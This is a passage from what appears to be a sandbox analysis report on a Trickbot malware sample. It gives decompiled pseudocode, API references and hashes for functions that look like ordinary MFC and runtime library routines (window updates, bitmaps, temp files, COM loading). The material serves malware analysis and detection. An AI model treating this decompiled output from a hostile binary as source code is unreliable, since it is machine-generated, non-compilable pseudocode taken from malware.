				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
					L6:
					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0x0000002f | 0x00000020;
						}
					}
					_t74 = E0042EE30(_v8, _a16);
					E0041B784(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
						_t29 = _t71 + 0x1c; // 0xec4589db
						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
					}
					E004272D6(E0041B5B5(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					_t32 = _t71 + 0x1c; // 0xec4589db
					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E0041B7D3(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t4 = _t71 + 0x70; // 0x8bfffed4
				_t76 =  *_t4;
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0042726E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E0041884D(_t77, GetParent( *(_t76 + 0x1c)));
					E0041B784(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0xc8))(1);
					goto L13;
				}
			}

0x0042f000
0x0042f003
0x0042f007
0x0042f00c
0x0042f012
0x0042f06b
0x0042f06f
0x0042f071
0x0042f079
0x0042f084
0x0042f084
0x0042f079
0x0042f096
0x0042f0a1
0x0042f0a9
0x0042f0ab
0x0042f0ae
0x0042f0ae
0x0042f0c1
0x0042f0cc
0x0042f0d4
0x0042f0d7
0x0042f0e2
0x0042f0f6
0x0042f0fa
0x0042f0e4
0x0042f0e8
0x0042f0ed
0x0042f0f0
0x00000000
0x0042f0f0
0x0042f0e2
0x0042f014
0x0042f014
0x0042f019
0x00000000
0x0042f037
0x0042f04a
0x0042f055
0x0042f060
0x00000000
0x0042f060

APIs

GetParent.USER32(?), ref: 0042F03A

Part of subcall function 0041B784: SetWindowPos.USER32(?,?,?,00000015,000000FF,000000FF,?), ref: 0041B7AB

GetWindowLongA.USER32(EC4589DB,000000F0), ref: 0042F0D7
UpdateWindow.USER32(?), ref: 0042F0F0

Strings

P, xrefs: 0042F075

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$LongParentUpdate
String ID: P
API String ID: 1906497633-3110715001
Opcode ID: baf10c5edfdae501b624b73378d3379000bd6265af31b9dce8643cf66eac25e9
Instruction ID: b919faccc7bccaa02f665cc23701f64dbe329708d68476e59ec41f884ccf73c3
Opcode Fuzzy Hash: baf10c5edfdae501b624b73378d3379000bd6265af31b9dce8643cf66eac25e9
Instruction Fuzzy Hash: 2331AFB1300614ABDB219F65D889BAB7BA5FF44704F80413AF942562E2CB79AC50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043059B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0043059B(void* __edx) {
				signed char* _v8;
				char _v12;
				int _v16;
				void _v148;
				unsigned int _t20;
				int _t26;
				signed int _t36;
				struct HINSTANCE__* _t38;
				struct HBITMAP__* _t39;
				int _t41;
				unsigned int _t43;
				void* _t47;
				signed int* _t48;
				signed int _t53;
				signed int _t57;
				void* _t58;
				void* _t60;

				_t47 = __edx;
				_t20 = GetMenuCheckMarkDimensions();
				_t41 = _t20;
				_t43 = _t20 >> 0x10;
				_v16 = _t43;
				if(_t41 > 0x20) {
					_t41 = 0x20;
				}
				asm("cdq");
				_t57 = _t41 + 0xf >> 4;
				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
				if(_t53 > 0xc) {
					_t53 = 0xc;
				}
				_t26 = 0x20;
				if(_t43 > _t26) {
					_v16 = _t26;
				}
				E00405360( &_v148, 0xff, 0x80);
				_v8 = 0x43acbc;
				_t58 = _t57 + _t57;
				_v12 = 5;
				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
				do {
					_v8 =  &(_v8[1]);
					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
					_t48[0] = _t36;
					 *_t48 = _t36;
					_t48 = _t48 + _t58;
					_t16 =  &_v12;
					 *_t16 = _v12 - 1;
				} while ( *_t16 != 0);
				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
				 *0x44b348 = _t38;
				if(_t38 == 0) {
					_t39 = LoadBitmapA(_t38, 0x7fe3);
					 *0x44b348 = _t39;
					return _t39;
				}
				return _t38;
			}

0x0043059b
0x004305a7
0x004305ad
0x004305b3
0x004305b9
0x004305bc
0x004305c0
0x004305c0
0x004305c7
0x004305ca
0x004305d8
0x004305dd
0x004305e1
0x004305e1
0x004305e4
0x004305e7
0x004305e9
0x004305e9
0x004305fd
0x0043060b
0x00430617
0x00430619
0x00430620
0x00430627
0x00430632
0x00430637
0x0043063b
0x0043063e
0x00430640
0x00430642
0x00430642
0x00430642
0x00430656
0x00430660
0x00430666
0x0043066e
0x00430674
0x00000000
0x00430674
0x0043067a

APIs

GetMenuCheckMarkDimensions.USER32 ref: 004305A7
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00430656
LoadBitmapA.USER32(00000000,00007FE3), ref: 0043066E

Strings

, xrefs: 004305B6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: ffe0ab43228ff084a4f90911189f8d1ddff9719e02bfd38893963e0d24404ed9
Instruction ID: f26c7202a2d319040538dd7cd5e6e728001670d89d8c8ed09b5f1c03cfacdf42
Opcode Fuzzy Hash: ffe0ab43228ff084a4f90911189f8d1ddff9719e02bfd38893963e0d24404ed9
Instruction Fuzzy Hash: 55213A71E00315AFEB10CF78DC8ABAE7BB8EB44700F055266E405EB282D674DA04CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040F99A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F99A(void* __ecx) {
				signed int _t22;
				signed char _t36;
				char* _t43;
				void* _t45;

				E00405340(E00438DBC, _t45);
				_t22 =  *(_t45 + 8) & 0x00000007;
				 *(__ecx + 4) = _t22;
				_t36 =  *(__ecx + 8) & _t22;
				if(_t36 != 0) {
					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
						E00405861(0, 0);
					}
					_t52 = _t36 & 0x00000004;
					if((_t36 & 0x00000004) == 0) {
						__eflags = _t36 & 0x00000002;
						_t43 = "ios::failbit set";
						if((_t36 & 0x00000002) == 0) {
							_t43 = "ios::eofbit set";
						}
					} else {
						_t43 = "ios::badbit set";
					}
					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
					E0040E765(_t45 - 0x1c, 0);
					E0040E9CB(_t45 - 0x1c, _t45, _t43, E00409BE0(_t43));
					_push(_t45 - 0x1c);
					 *((intOrPtr*)(_t45 - 4)) = 0;
					E0040FA36(_t45 - 0x38, _t52);
					 *((intOrPtr*)(_t45 - 0x38)) = 0x43ecdc;
					_t22 = E00405861(_t45 - 0x38, 0x443f70);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

0x0040f99f
0x0040f9ab
0x0040f9ae
0x0040f9b4
0x0040f9b6
0x0040f9bd
0x0040f9c1
0x0040f9c1
0x0040f9c6
0x0040f9ca
0x0040f9d3
0x0040f9d6
0x0040f9db
0x0040f9dd
0x0040f9dd
0x0040f9cc
0x0040f9cc
0x0040f9cc
0x0040f9e9
0x0040f9ec
0x0040f9fd
0x0040fa08
0x0040fa09
0x0040fa0c
0x0040fa1a
0x0040fa21
0x0040fa26
0x0040fa2b
0x0040fa33

APIs

__EH_prolog.LIBCMT ref: 0040F99F

Part of subcall function 00405861: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0040588F

Strings

ios::badbit set, xrefs: 0040F9CC
ios::eofbit set, xrefs: 0040F9DD, 0040F9F1, 0040F9F9
ios::failbit set, xrefs: 0040F9D6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: 8f7860b5969a299d8171c9c0b3cb4ded9c30d0d675705e0a2a0961ac3a254688
Instruction ID: 22ca2f90c919cb8fc34a7d47afa2fb2c336a97883ef66b32558618a45977eb88
Opcode Fuzzy Hash: 8f7860b5969a299d8171c9c0b3cb4ded9c30d0d675705e0a2a0961ac3a254688
Instruction Fuzzy Hash: 4C1170B2D01149AAC710EBA6D892AEF7778AB04308F14903BF805766C2E63C9909CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0AF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F0AF(void* __eflags) {
				intOrPtr _t22;
				intOrPtr _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E00405340(E00437A1B, _t47);
				_t22 =  *0x447478; // 0x44748c
				 *((intOrPtr*)(_t47 - 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
				_t45 = 1;
				 *((intOrPtr*)(_t47 - 4)) = _t45;
				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
				 *( *(_t47 + 0xc)) = 0;
				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E004181F7(_t47 - 0x10, _t47, 0x105));
				E00418246(_t47 - 0x10, _t52, 0xffffffff);
				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
					E0041D456( *((intOrPtr*)(_t47 - 0x10)));
				}
				E00417C3D( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
				 *((char*)(_t47 - 4)) = 0;
				E00417EC8(_t47 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return  *((intOrPtr*)(_t47 + 8));
			}

0x0041f0af
0x0041f0b4
0x0041f0bf
0x0041f0c8
0x0041f0cb
0x0041f0d3
0x0041f0e4
0x0041f0e7
0x0041f0f8
0x0041f10d
0x0041f118
0x0041f120
0x0041f125
0x0041f125
0x0041f131
0x0041f136
0x0041f13c
0x0041f13f
0x0041f14c
0x0041f154

APIs

__EH_prolog.LIBCMT ref: 0041F0B4
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0041F0E7
GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000), ref: 0041F10D

Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259

Part of subcall function 0041D456: DeleteFileA.KERNEL32(?), ref: 0041D45A
Part of subcall function 0041D456: GetLastError.KERNEL32(00000000), ref: 0041D465

Strings

MFC, xrefs: 0041F107

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
String ID: MFC
API String ID: 501224598-3472178984
Opcode ID: 8bc5e64123c978b0ca69b2365c6ce1504c3736efebab67727d5b29e1de8738a7
Instruction ID: bb4439f9e9b66fb19035fbe3e0267505a95521a72802ad2b31f37c00ac6d6f1d
Opcode Fuzzy Hash: 8bc5e64123c978b0ca69b2365c6ce1504c3736efebab67727d5b29e1de8738a7
Instruction Fuzzy Hash: 92114FB5900219EFDB00EF94DC819EEBB78FB08314F00456AF921A7190D7789A84CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041D4B6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041D4B6(void* __ecx, void* __eflags) {
				CHAR* _t24;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t31;
				CHAR* _t38;
				void* _t39;
				void* _t41;

				E00405340(E004384FC, _t41);
				_t38 =  *(_t41 + 0x10);
				 *_t38 =  *_t38 & 0x00000000;
				E0041D553(_t41 - 0x10,  *((intOrPtr*)(_t41 + 8)));
				_t24 =  *0x447478; // 0x44748c
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				 *(_t41 + 0x10) = _t24;
				 *(_t41 - 4) = 1;
				if(E0041D5C2( *((intOrPtr*)(_t41 - 0x10)), _t41 + 0x10) != 0) {
					_t27 = LoadLibraryA( *(_t41 + 0x10));
					if(_t27 == 0) {
						goto L1;
					}
					_t31 = GetProcAddress(_t27, "DllGetClassObject");
					if(_t31 == 0) {
						_t39 = 0x800401f9;
					} else {
						_t39 =  *_t31( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t38);
					}
					L6:
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E00417EC8(_t41 + 0x10);
					 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
					E00417EC8(_t41 - 0x10);
					 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
					return _t39;
				}
				L1:
				_t39 = 0x80040154;
				goto L6;
			}

0x0041d4bb
0x0041d4c2
0x0041d4cb
0x0041d4cf
0x0041d4d4
0x0041d4d9
0x0041d4dd
0x0041d4e3
0x0041d4f2
0x0041d4fe
0x0041d506
0x00000000
0x00000000
0x0041d50e
0x0041d516
0x0041d525
0x0041d518
0x0041d521
0x0041d521
0x0041d52a
0x0041d52a
0x0041d531
0x0041d536
0x0041d53d
0x0041d548
0x0041d550
0x0041d550
0x0041d4f4
0x0041d4f4
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0041D4BB

Part of subcall function 0041D553: wsprintfA.USER32 ref: 0041D5A3

Part of subcall function 0041D5C2: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 0041D5E3
Part of subcall function 0041D5C2: RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 0041D5F7
Part of subcall function 0041D5C2: RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 0041D612
Part of subcall function 0041D5C2: RegQueryValueExA.ADVAPI32(?,00449350,00000000,?,00000000,?,00000104), ref: 0041D63B
Part of subcall function 0041D5C2: RegCloseKey.ADVAPI32(?,000000FF), ref: 0041D659
Part of subcall function 0041D5C2: RegCloseKey.ADVAPI32(00000001), ref: 0041D65E
Part of subcall function 0041D5C2: RegCloseKey.ADVAPI32(?), ref: 0041D663

LoadLibraryA.KERNEL32(?), ref: 0041D4FE
GetProcAddress.KERNEL32(00000000,DllGetClassObject,?,?,0041D48D,?,0043EB78,00000000), ref: 0041D50E

Strings

DllGetClassObject, xrefs: 0041D508

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
String ID: DllGetClassObject
API String ID: 821125782-1075368562
Opcode ID: 4a8370be90e33a51bc95324451679615b72646fab866b861d75234d99f63e4df
Instruction ID: 93839fda6c0f7cc7694f3a88825118a1c7ede2de16b31bf19d6902fe3e05a4cd
Opcode Fuzzy Hash: 4a8370be90e33a51bc95324451679615b72646fab866b861d75234d99f63e4df
Instruction Fuzzy Hash: 07115E7191025AEBCF119F64CC05BEE7BB9EF04358F10446AF825A61A0D778AE54CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004309F8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004309F8() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x4478f8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E00405360( &_v24, 0, 0x14);
					_v24 = 0x14;
					_push( &_v24);
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x4478f8 = _t19;
				return _t19;
			}

0x004309fe
0x00430a06
0x00430a65
0x00430a65
0x00430a21
0x00430a23
0x00430a2a
0x00430a34
0x00430a3f
0x00430a46
0x00430a4b
0x00430a58
0x00430a58
0x00430a4b
0x00430a5a
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 00430A0F
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00430A1B

Strings

COMCTL32.DLL, xrefs: 00430A0A
DllGetVersion, xrefs: 00430A15

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 2ba1470fe9eaf14c34b93460787331a8861a58831de3e76916504415076bd2e4
Instruction ID: 432aa2954531b1f26eda2fdcb1b63a56cd6e22fcf95aab065aa73b88cd92e205
Opcode Fuzzy Hash: 2ba1470fe9eaf14c34b93460787331a8861a58831de3e76916504415076bd2e4
Instruction Fuzzy Hash: 40F044B1E0032956D710A7E9AC49BAA77E8A718755F101136FA14F31D0D2B4DD0487A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C7D0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C7D0(void** __ecx, intOrPtr _a4, char _a8) {
				intOrPtr _t8;
				void* _t10;
				signed int _t13;
				void* _t18;
				signed int* _t21;
				void** _t23;

				_t1 =  &_a8; // 0x417672
				_t8 =  *_t1;
				_t23 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t8;
				_t10 = GlobalAlloc(0x40, _t8 + 0x40);
				 *_t23 = _t10;
				if(_t10 != 0) {
					_t21 = GlobalLock(_t10);
					E00405400(_t21, _a4, _t23[1]);
					if(_t21[0] != 0xffff) {
						_t13 =  *_t21;
					} else {
						_t13 = _t21[3];
					}
					_t23[2] =  !_t13 >> 0x00000006 & 0x00000001;
					GlobalUnlock( *_t23);
					_t18 = 1;
					return _t18;
				}
				return _t10;
			}

0x0041c7d0
0x0041c7d0
0x0041c7d5
0x0041c7d7
0x0041c7e0
0x0041c7e8
0x0041c7ea
0x0041c7f7
0x0041c7fe
0x0041c80c
0x0041c813
0x0041c80e
0x0041c80e
0x0041c80e
0x0041c81f
0x0041c822
0x0041c82a
0x00000000
0x0041c82b
0x0041c82d

APIs

GlobalAlloc.KERNEL32(00000040,rvA,?,0041C7C9,?,00000000,?,?,00417672,?,00000000,?), ref: 0041C7E0
GlobalLock.KERNEL32(00000000,?,?,00417672,?,00000000,?), ref: 0041C7EE
GlobalUnlock.KERNEL32(?,?,00417672,?,00000000,?), ref: 0041C822

Strings

rvA, xrefs: 0041C7D0, 0041C7DD

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$AllocLockUnlock
String ID: rvA
API String ID: 3972497268-3498756698
Opcode ID: 77d5fd399ad9eae8306100da8a6541f83ac00fad0d4aabd55f58c2dbcafa4645
Instruction ID: 689f8e1c12338ae9ecab0fcdf3bd1a7f7d155b3142424dfff37cbb3affb9b701
Opcode Fuzzy Hash: 77d5fd399ad9eae8306100da8a6541f83ac00fad0d4aabd55f58c2dbcafa4645
Instruction Fuzzy Hash: 0CF09672900602AFD7209FA5DC89E67B7F4FB48711B14C82EF555C3250D774D891CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004225BE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004225BE(struct HWND__* _a4, intOrPtr _a8) {
				char _v16;
				signed int _t13;

				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					return 0;
				} else {
					GetClassNameA(_a4,  &_v16, 0xa);
					_t13 = lstrcmpiA( &_v16, "combobox");
					asm("sbb eax, eax");
					return  ~_t13 + 1;
				}
			}

0x004225c8
0x00000000
0x004225e1
0x004225ea
0x004225f9
0x00422601
0x00000000
0x00422603

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF
GetClassNameA.USER32(00000000,?,0000000A), ref: 004225EA
lstrcmpiA.KERNEL32(?,combobox), ref: 004225F9

Strings

combobox, xrefs: 004225F3

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: 5535f7b0375449af03b9945d7961be83123b90210762a0789c7d4255cb98595f
Instruction ID: 4084231c94a1c79152f266541867287252df8db8380d57d64c55b9fd5e0d93c0
Opcode Fuzzy Hash: 5535f7b0375449af03b9945d7961be83123b90210762a0789c7d4255cb98595f
Instruction Fuzzy Hash: 8BE06532654108BBCF119F60EC49E9D3768E715345F50C121B812D51F0D7B4EA85DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407BCA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00407BCA() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				void* _t10;
				struct HINSTANCE__* _t19;

				_t19 = GetModuleHandleA("KERNEL32");
				if(_t19 == 0) {
					L6:
					_v12 =  *0x43e6b0;
					_v20 =  *0x43e6a8;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x43e6a0]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t19 <= 0) {
						return 0;
					} else {
						_t10 = 1;
						return _t10;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00407bd5
0x00407bd7
0x00407bee
0x00407b98
0x00407ba1
0x00407bad
0x00407bb0
0x00407bb6
0x00407bbc
0x00407bbe
0x00407bbf
0x00407bc9
0x00407bc1
0x00407bc3
0x00407bc5
0x00407bc5
0x00407bd9
0x00407bdf
0x00407be7
0x00000000
0x00407be9
0x00407be9
0x00407bed
0x00407bed
0x00407be7

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00404FE0), ref: 00407BCF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407BDF

Strings

IsProcessorFeaturePresent, xrefs: 00407BD9
KERNEL32, xrefs: 00407BCA

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 8e0a3abbf03ecb08a25e6692be1e91d9193d15f6f5dd8fe7d5c554f1cba35dc9
Instruction ID: 38e3e38c87443376e618666a2d966511a7ffde51e86cea0a72677456cd78b31c
Opcode Fuzzy Hash: 8e0a3abbf03ecb08a25e6692be1e91d9193d15f6f5dd8fe7d5c554f1cba35dc9
Instruction Fuzzy Hash: 64C012A074D20152EAD017620D09B6735289B4CB46F2820367806E51C0CBACF400853E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4AE, Relevance: 6.3, APIs: 5, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041E4AE(intOrPtr __ecx, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				void* _t41;
				intOrPtr _t43;
				void* _t46;
				signed int _t54;
				CHAR* _t56;
				int _t66;
				CHAR* _t73;
				signed int _t76;
				void* _t77;
				void* _t79;
				void* _t80;

				_t76 = _a8 << 2;
				_v8 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t76)) - 8)) != 0) {
					_t73 = E004181F7(_a4, _t80, 0x104);
					lstrcpyA(_t73,  *( *((intOrPtr*)(_v8 + 8)) + _t76));
					_t41 = E00433CD5(_t73, 0, 0);
					_t77 = 1;
					_t79 = _t77 - _t41 + lstrlenA(_t73);
					_t43 = _a16;
					__eflags = _t79 - _t43;
					if(_t79 != _t43) {
						L5:
						__eflags =  *((intOrPtr*)(_v8 + 0x18)) - 0xffffffff;
						if(__eflags != 0) {
							_a8 = _t79 + _t73;
							E0041D9E9(_t79 + _t73,  &_v268, 0x104);
							_t66 = 0x104 - _t79;
							__eflags = _t66;
							lstrcpynA(_a8,  &_v268, _t66);
							E0041E1B5(__eflags, _t73,  *((intOrPtr*)(_v8 + 0x18)), _a20);
						}
						L7:
						E00418246(_a4, __eflags, 0xffffffff);
						_t46 = 1;
						return _t46;
					}
					 *(_t43 + _t73) =  *(_t43 + _t73) & 0x00000000;
